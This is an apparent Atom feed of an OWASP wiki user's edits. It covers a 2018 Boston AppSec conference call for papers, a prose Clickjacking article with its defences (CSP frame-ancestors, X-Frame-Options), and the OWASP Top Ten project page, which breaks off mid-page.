<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Neil+Smithline</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Neil+Smithline"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Neil_Smithline"/>
		<updated>2026-05-05T17:39:26Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=BASC_2018_Call_For_Papers&amp;diff=242553</id>
		<title>BASC 2018 Call For Papers</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=BASC_2018_Call_For_Papers&amp;diff=242553"/>
				<updated>2018-08-15T14:17:33Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Removed duplicate bullet (maybe the other bullets need a refresh - I see Google Glass in them)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{2018_BASC:Header_Template | Home}}&lt;br /&gt;
&lt;br /&gt;
== Submit Your Proposal ==&lt;br /&gt;
&lt;br /&gt;
Please use [https://owasp.submittable.com/submit/118363/basc-cfp-boston-application-security-conference-october-27-2018 this form] to submit your proposal for a presentation.&lt;br /&gt;
&lt;br /&gt;
Please use [https://owasp.submittable.com/submit/118366/basc-cfw-boston-application-security-conference-october-27-2018 this form] to submit your proposal for a workshop.&lt;br /&gt;
&lt;br /&gt;
Deadline for proposals: September 28, 2018&lt;br /&gt;
&lt;br /&gt;
Conference date: October 27, 2018&lt;br /&gt;
&lt;br /&gt;
== About BASC == &lt;br /&gt;
&lt;br /&gt;
The [[Boston | OWASP Boston chapter]] would like to announce a call for papers and free workshops for the Boston Application Security Conference 2018 on October 27, 2018. This our eighth annual conference.&lt;br /&gt;
&lt;br /&gt;
The OWASP BASC (Boston Application Security Conference) will be a free, one day, informal conference, aimed at increasing awareness and knowledge of application security in the greater Boston area. While many of the presentations will cover state-of-the-art application security concepts, the BASC is intended to appeal to a wide range of attendees. Application security professionals, professional software developers, software quality engineers, computer science students, and security software vendors will come to the BASC to learn, interact and hopefully enjoy themselves at the same time. We encourage local students, security professionals and academics to present papers as a way to gain exposure and experience in presenting at security conferences.&lt;br /&gt;
&lt;br /&gt;
We expect over 200 attendees this year. Publicity includes the OWASP Boston wiki site (run by OWASP Foundation), OWASP Boston Meetup, OWASP Boston Linkedin group, OWASP Boston mailing list, Eventbrite and Twitter.&lt;br /&gt;
==Past conference presentations==&lt;br /&gt;
[[2017 BASC Presentations]]  &amp;amp;middot;[[2016 BASC Presentations]]  &amp;amp;middot; [[2015 BASC Presentations]] &amp;amp;middot; [[2014 BASC Presentations]] &amp;amp;middot; [[2012 BASC Presentations]] &amp;amp;middot; [[2011 BASC Presentations]] &amp;amp;middot; [[2010 BASC Presentations]]&lt;br /&gt;
&lt;br /&gt;
==Guidelines==&lt;br /&gt;
Last year, there were two tracks:&lt;br /&gt;
&lt;br /&gt;
Track 1 - Basic/Current Application Security&lt;br /&gt;
&lt;br /&gt;
Track 2 - Future / Advanced / New Research in Application security.&lt;br /&gt;
&lt;br /&gt;
Each presentation will be 50 minutes.&lt;br /&gt;
&lt;br /&gt;
We attract both people who are new to application security as well as people who are experienced in application security.&lt;br /&gt;
&lt;br /&gt;
We encourage first time presenters: students, researchers, working application security folks etc. to submit presentations.&lt;br /&gt;
==Some Suggested Topics==&lt;br /&gt;
&amp;lt;div style=&amp;quot;column-count:3;-moz-column-count:3;-webkit-column-count:3&amp;quot;&amp;gt;&lt;br /&gt;
*Mobile app security, forensics&lt;br /&gt;
&lt;br /&gt;
*Javascript servers, apps, frameworks: Node.js, Angular&lt;br /&gt;
&lt;br /&gt;
*Language Framework (in)security – Hibernate, Grails, Ruby etc.&lt;br /&gt;
&lt;br /&gt;
*Security for NFC, Bluetooth LE apps&lt;br /&gt;
&lt;br /&gt;
*Google Glass app security&lt;br /&gt;
&lt;br /&gt;
*OWASP ESAPI&lt;br /&gt;
&lt;br /&gt;
*Measurable security - advanced threat modelling&lt;br /&gt;
&lt;br /&gt;
*Web API security REST, JSON&lt;br /&gt;
&lt;br /&gt;
*Application Architecture security&lt;br /&gt;
&lt;br /&gt;
*Web security testing in a DevOps organization&lt;br /&gt;
&lt;br /&gt;
*Building web app security expertise in engineering teams&lt;br /&gt;
&lt;br /&gt;
*Conducting lightweight threat modeling&lt;br /&gt;
&lt;br /&gt;
*Vulnerability Management - Process &amp;amp; Tools&lt;br /&gt;
&lt;br /&gt;
*Developing your own web app security development standard&lt;br /&gt;
&lt;br /&gt;
*Security test automation with OWASP ZAP and Zest scripting language&lt;br /&gt;
&lt;br /&gt;
*Authentication &amp;amp; Enterprise Web Applications (incl. Federation, 2 Factor Auth, SSO)&lt;br /&gt;
&lt;br /&gt;
*Open Source Identity Management&lt;br /&gt;
&lt;br /&gt;
*Open Source Static Analysis&lt;br /&gt;
&lt;br /&gt;
*Security Unit testing with Selenium&lt;br /&gt;
&lt;br /&gt;
*Effective static code analysis tools&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Submit==&lt;br /&gt;
&lt;br /&gt;
Please use [https://owasp.submittable.com/submit/118363/basc-cfp-boston-application-security-conference-october-27-2018 this form] to submit your proposal for a presentation.&lt;br /&gt;
&lt;br /&gt;
Please use [https://owasp.submittable.com/submit/118366/basc-cfw-boston-application-security-conference-october-27-2018 this form] to submit your proposal for a workshop.&lt;br /&gt;
&lt;br /&gt;
Deadline for proposals: September 28, 2018&lt;br /&gt;
&lt;br /&gt;
Conference date: October 27, 2018&lt;br /&gt;
&lt;br /&gt;
If you have any questions, please email [mailto:boston@owasp.org boston@owasp.org].&lt;br /&gt;
&lt;br /&gt;
{{2018_BASC:Footer_Template | Welcome}}&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Clickjacking&amp;diff=236377</id>
		<title>Clickjacking</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Clickjacking&amp;diff=236377"/>
				<updated>2017-12-21T21:16:19Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: /* References */ added Mozilla's CSP/frame-ancestors&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Clickjacking, also known as a &amp;quot;UI redress attack&amp;quot;, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is &amp;quot;hijacking&amp;quot; clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.&lt;br /&gt;
&lt;br /&gt;
Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
=Examples=&lt;br /&gt;
&lt;br /&gt;
For example, imagine an attacker who builds a web site that has a button on it that says &amp;quot;click here for a free iPod&amp;quot;.  However, on top of that web page, the attacker has loaded an iframe with your mail account, and lined up exactly the &amp;quot;delete all messages&amp;quot; button directly on top of the &amp;quot;free iPod&amp;quot; button.  The victim tries to click on the &amp;quot;free iPod&amp;quot; button but instead actually clicked on the invisible &amp;quot;delete all messages&amp;quot; button.  In essence, the attacker has &amp;quot;hijacked&amp;quot; the user's click, hence the name &amp;quot;Clickjacking&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
One of the most notorious examples of Clickjacking was an attack against the [http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html Adobe Flash plugin settings page]. By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.&lt;br /&gt;
&lt;br /&gt;
Clickjacking also made the news in the form of a [http://shiflett.org/blog/2009/feb/twitter-dont-click-exploit Twitter worm]. This clickjacking attack convinced users to click on a button which caused them to re-tweet the location of the malicious page, and propagated massively.&lt;br /&gt;
&lt;br /&gt;
There have also been clickjacking attacks abusing Facebook's &amp;quot;Like&amp;quot; functionality. [http://threatpost.com/en_us/blogs/facebook-jacking-scams-expand-060310 Attackers can trick logged-in Facebook users to arbitrarily like fan pages, links, groups, etc]&lt;br /&gt;
&lt;br /&gt;
= Defending against Clickjacking =&lt;br /&gt;
There are two main ways to prevent clickjacking:&lt;br /&gt;
# Sending the proper Content Security Policy (CSP) frame-ancestors directive response headers that instruct the browser to not allow framing from other domains. (This replaces the older X-Frame-Options HTTP headers.)&lt;br /&gt;
# Employing defensive code in the UI to ensure that the current frame is the most top level window&lt;br /&gt;
&lt;br /&gt;
For more information on Clickjacking defense, please see the the [[Clickjacking Defense Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
= References =&lt;br /&gt;
* [https://www.linkedin.com/pulse/20141202104842-120953718-why-am-i-anxious-about-clickjacking Why am I anxious about Clickjacking?]&lt;br /&gt;
:  A Basic understanding of Clickjacking Attack&lt;br /&gt;
&lt;br /&gt;
* https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors&lt;br /&gt;
: Mozilla developer resource on Content-Security-Policy frame-ancestors response header.&lt;br /&gt;
&lt;br /&gt;
* https://developer.mozilla.org/en-US/docs/The_X-FRAME-OPTIONS_response_header&lt;br /&gt;
: Mozilla developer resource on the X-Frame-Options response header.&lt;br /&gt;
&lt;br /&gt;
* [http://w2spconf.com/2010/papers/p27.pdf Busting Frame Busting: A study of clickjacking vulnerabilites on top sites]&lt;br /&gt;
: A study by the Stanford Web Security Group outlining problems with deployed frame busting code.&lt;br /&gt;
&lt;br /&gt;
* [http://www.sectheory.com/clickjacking.htm Clickjacking, Sec Theory]&lt;br /&gt;
: A paper by Robert Hansen defining the term, its implications against Flash at the time of writing, and a disclosure timeline.&lt;br /&gt;
&lt;br /&gt;
* [https://www.codemagi.com/blog/post/194 https://www.codemagi.com/blog/post/194] &lt;br /&gt;
: Framebreaking defense for legacy browsers that do not support X-Frame-Option headers.&lt;br /&gt;
&lt;br /&gt;
* [[ClickjackFilter_for_Java_EE|Anti-clickjacking J2EE filter]]&lt;br /&gt;
: A simple J2EE servlet filter that sends anti-framing headers to the browser.&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Clickjacking&amp;diff=236376</id>
		<title>Clickjacking</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Clickjacking&amp;diff=236376"/>
				<updated>2017-12-21T21:04:50Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: updated with CSP defense&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Clickjacking, also known as a &amp;quot;UI redress attack&amp;quot;, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is &amp;quot;hijacking&amp;quot; clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.&lt;br /&gt;
&lt;br /&gt;
Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
=Examples=&lt;br /&gt;
&lt;br /&gt;
For example, imagine an attacker who builds a web site that has a button on it that says &amp;quot;click here for a free iPod&amp;quot;.  However, on top of that web page, the attacker has loaded an iframe with your mail account, and lined up exactly the &amp;quot;delete all messages&amp;quot; button directly on top of the &amp;quot;free iPod&amp;quot; button.  The victim tries to click on the &amp;quot;free iPod&amp;quot; button but instead actually clicked on the invisible &amp;quot;delete all messages&amp;quot; button.  In essence, the attacker has &amp;quot;hijacked&amp;quot; the user's click, hence the name &amp;quot;Clickjacking&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
One of the most notorious examples of Clickjacking was an attack against the [http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html Adobe Flash plugin settings page]. By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.&lt;br /&gt;
&lt;br /&gt;
Clickjacking also made the news in the form of a [http://shiflett.org/blog/2009/feb/twitter-dont-click-exploit Twitter worm]. This clickjacking attack convinced users to click on a button which caused them to re-tweet the location of the malicious page, and propagated massively.&lt;br /&gt;
&lt;br /&gt;
There have also been clickjacking attacks abusing Facebook's &amp;quot;Like&amp;quot; functionality. [http://threatpost.com/en_us/blogs/facebook-jacking-scams-expand-060310 Attackers can trick logged-in Facebook users to arbitrarily like fan pages, links, groups, etc]&lt;br /&gt;
&lt;br /&gt;
= Defending against Clickjacking =&lt;br /&gt;
There are two main ways to prevent clickjacking:&lt;br /&gt;
# Sending the proper Content Security Policy (CSP) frame-ancestors directive response headers that instruct the browser to not allow framing from other domains. (This replaces the older X-Frame-Options HTTP headers.)&lt;br /&gt;
# Employing defensive code in the UI to ensure that the current frame is the most top level window&lt;br /&gt;
&lt;br /&gt;
For more information on Clickjacking defense, please see the the [[Clickjacking Defense Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
= References =&lt;br /&gt;
* [https://www.linkedin.com/pulse/20141202104842-120953718-why-am-i-anxious-about-clickjacking Why am I anxious about Clickjacking?]&lt;br /&gt;
:  A Basic understanding of Clickjacking Attack&lt;br /&gt;
&lt;br /&gt;
* https://developer.mozilla.org/en-US/docs/The_X-FRAME-OPTIONS_response_header&lt;br /&gt;
: Mozilla developer resource on The X-Frame-Options response header.&lt;br /&gt;
&lt;br /&gt;
* [http://w2spconf.com/2010/papers/p27.pdf Busting Frame Busting: A study of clickjacking vulnerabilites on top sites]&lt;br /&gt;
: A study by the Stanford Web Security Group outlining problems with deployed frame busting code.&lt;br /&gt;
&lt;br /&gt;
* [http://www.sectheory.com/clickjacking.htm Clickjacking, Sec Theory]&lt;br /&gt;
: A paper by Robert Hansen defining the term, its implications against Flash at the time of writing, and a disclosure timeline.&lt;br /&gt;
&lt;br /&gt;
* [https://www.codemagi.com/blog/post/194 https://www.codemagi.com/blog/post/194] &lt;br /&gt;
: Framebreaking defense for legacy browsers that do not support X-Frame-Option headers.&lt;br /&gt;
&lt;br /&gt;
* [[ClickjackFilter_for_Java_EE|Anti-clickjacking J2EE filter]]&lt;br /&gt;
: A simple J2EE servlet filter that sends anti-framing headers to the browser.&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP-Top-10-2017-en.pdf&amp;diff=235653</id>
		<title>File:OWASP-Top-10-2017-en.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP-Top-10-2017-en.pdf&amp;diff=235653"/>
				<updated>2017-11-20T17:46:42Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235652</id>
		<title>File:OWASP Top 10-2017 (en).pdf.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235652"/>
				<updated>2017-11-20T17:42:53Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Neil Smithline uploaded a new version of File:OWASP Top 10-2017 (en).pdf.pdf&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;2017 Top 10&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235651</id>
		<title>File:OWASP Top 10-2017 (en).pdf.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235651"/>
				<updated>2017-11-20T17:41:25Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Neil Smithline uploaded a new version of File:OWASP Top 10-2017 (en).pdf.pdf&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;2017 Top 10&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235650</id>
		<title>File:OWASP Top 10-2017 (en).pdf.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235650"/>
				<updated>2017-11-20T17:40:09Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Neil Smithline uploaded a new version of File:OWASP Top 10-2017 (en).pdf.pdf&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;2017 Top 10&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235649</id>
		<title>File:OWASP Top 10-2017 (en).pdf.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_Top_10-2017_(en).pdf.pdf&amp;diff=235649"/>
				<updated>2017-11-20T17:27:45Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Neil Smithline uploaded a new version of File:OWASP Top 10-2017 (en).pdf.pdf&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;2017 Top 10&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235646</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235646"/>
				<updated>2017-11-20T16:36:31Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: 2017 updates&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The [[Media:OWASP_Top_10-2017_(en).pdf.pdf| OWASP Top 10 - 2017]] is now available. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* 2017 translations are currently underway&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/4.0/ Creative Commons Attribution-ShareAlike 4.0 license].&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10-2017_(en).pdf.pdf| OWASP Top 10 - 2017] - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub](preferred)&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 - RC2 Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
